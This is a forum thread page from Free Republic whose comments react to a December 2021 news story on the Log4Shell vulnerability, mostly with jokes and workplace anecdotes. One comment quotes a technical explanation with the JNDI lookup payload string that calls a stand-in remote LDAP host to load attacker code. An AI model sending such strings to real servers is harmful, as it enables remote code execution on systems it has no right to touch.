Free Republic
Browse · Search
News/Activism
Topics · Post Article

Skip to comments.

Internet is scrambling to fix Log4Shell, the worst hack in history
BGR via msn ^ | 12 December 2021 | Chris Smith

Posted on 12/12/2021 9:08:33 PM PST by blueplum

click here to read article


Navigation: use the links below to view more comments.
first previous 1-2021-31 last
To: blueplum

The worst! IN HISTORY!

Good grief.


21 posted on 12/13/2021 1:59:51 AM PST by Fury
[ Post Reply | Private Reply | To 1 | View Replies]

To: Fury

It’s the Omicron hack.


22 posted on 12/13/2021 2:00:33 AM PST by gitmo (If your theology doesn't become your biography, what good is it?)
[ Post Reply | Private Reply | To 21 | View Replies]

To: Mr Radical

I know the programmers in my company spent a long Friday night doing code fixes for this. I wouldn’t be surprised if a lot of software across the US was taken down for repairs over the weekend.


23 posted on 12/13/2021 2:19:09 AM PST by SauronOfMordor (A Leftist can't enjoy life unless they are controlling, hurting, or destroying others)
[ Post Reply | Private Reply | To 18 | View Replies]

To: blueplum

Technical article on the exploit

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/

The vulnerability is triggered by a simple string sent to a vulnerable server:

${jndi:ldap://example.com/a}

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.


24 posted on 12/13/2021 2:23:04 AM PST by SauronOfMordor (A Leftist can't enjoy life unless they are controlling, hurting, or destroying others)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Mr Radical

eBay sent an unusual email early Friday morning saying they were turning off their automatic payment system. The explanation was vague but it made me wonder if they were having an IT security issue.


25 posted on 12/13/2021 3:16:20 AM PST by Yardstick
[ Post Reply | Private Reply | To 18 | View Replies]

To: blueplum

Rd later.


26 posted on 12/13/2021 3:23:17 AM PST by NetAddicted ( Just looking)
[ Post Reply | Private Reply | To 1 | View Replies]

To: blueplum; rdb3; JosephW; martin_fierro; Still Thinking; zeugma; Vinnie; ironman; Egon; raybbr; ...

27 posted on 12/13/2021 3:48:07 AM PST by ShadowAce (Linux - The Ultimate Windows Service Pack )
[ Post Reply | Private Reply | To 1 | View Replies]

To: Bikkuri

I agree ... ‘java’ is for people who are not mentally sharp or disciplined enough to learn ‘c++’.

Let the firestorm ensue ...


28 posted on 12/13/2021 4:11:27 AM PST by ByteMercenary (Slo-Joe and KamalHo are not my leaders.)
[ Post Reply | Private Reply | To 6 | View Replies]

To: SauronOfMordor

bttt


29 posted on 12/13/2021 5:05:59 AM PST by linMcHlp
[ Post Reply | Private Reply | To 24 | View Replies]

To: TexasGunLover

You have my empathy. Teams in my division haven’t stopped since Thursday PM when the CVE published. This is a nasty one.


30 posted on 12/13/2021 6:22:53 AM PST by paulcissa (Politicians want you unarmed so they can kill you.)
[ Post Reply | Private Reply | To 15 | View Replies]

To: Squidpup

log4j bookmark


31 posted on 12/16/2021 12:44:20 PM PST by Squidpup ("Fight the Good Fight of Faith" )
[ Post Reply | Private Reply | To 24 | View Replies]


Navigation: use the links below to view more comments.
first previous 1-2021-31 last

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.

Free Republic
Browse · Search
News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson